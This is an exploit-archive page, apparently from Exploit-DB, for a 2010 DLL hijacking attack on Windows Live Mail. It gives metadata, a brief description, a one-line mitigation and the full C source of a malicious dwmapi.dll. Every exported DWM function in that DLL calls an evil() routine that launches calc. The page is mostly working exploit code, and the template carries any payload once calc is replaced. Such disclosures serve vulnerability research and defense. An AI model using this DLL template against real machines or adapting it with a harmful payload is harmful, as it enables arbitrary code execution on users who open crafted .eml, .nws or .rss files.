Windows Live Email DLL Hijacking Exploit ( dwmapi.dll )

vendor:

Windows Live Suite

by:

Nicolas Krassas

7,5

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Windows Live Suite

Affected Version From: Latest Windows Live Suite

Affected Version To: Latest Windows Live Suite

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Windows Live Email DLL Hijacking Exploit ( dwmapi.dll )

This exploit is based on the exploit from 'TheLeader' and is used to hijack Windows Live Email DLLs. It is tested on Windows XP SP3 and vulnerable extensions are .eml, .nws and .rss. The code includes a function 'evil()' which executes the Windows calculator when called.

Mitigation:

Ensure that all applications are up-to-date and patched with the latest security updates. Also, ensure that all DLLs are properly signed and verified.

Source

Exploit-DB raw data:

/* 
Exploit Title: Windows Live Email DLL Hijacking Exploit ( dwmapi.dll )
Date: 24/08/2010
Author: Nicolas Krassas 
http://twitter.com/Dinosn
Version: Latest windows live suite
Tested on: Windows XP SP3
The code is based on the exploit from "TheLeader"
Vulnerable extensions: .eml .nws .rss
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void  DwmDefWindowProc() { evil(); }
DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void  DwmEnableComposition() { evil(); }
DLLIMPORT void  DwmEnableMMCSS() { evil(); }
DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void  DwmGetColorizationColor() { evil(); }
DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void  DwmGetWindowAttribute() { evil(); }
DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void  DwmRegisterThumbnail() { evil(); }
DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void  DwmSetPresentParameters() { evil(); }
DLLIMPORT void  DwmSetWindowAttribute() { evil(); }
DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}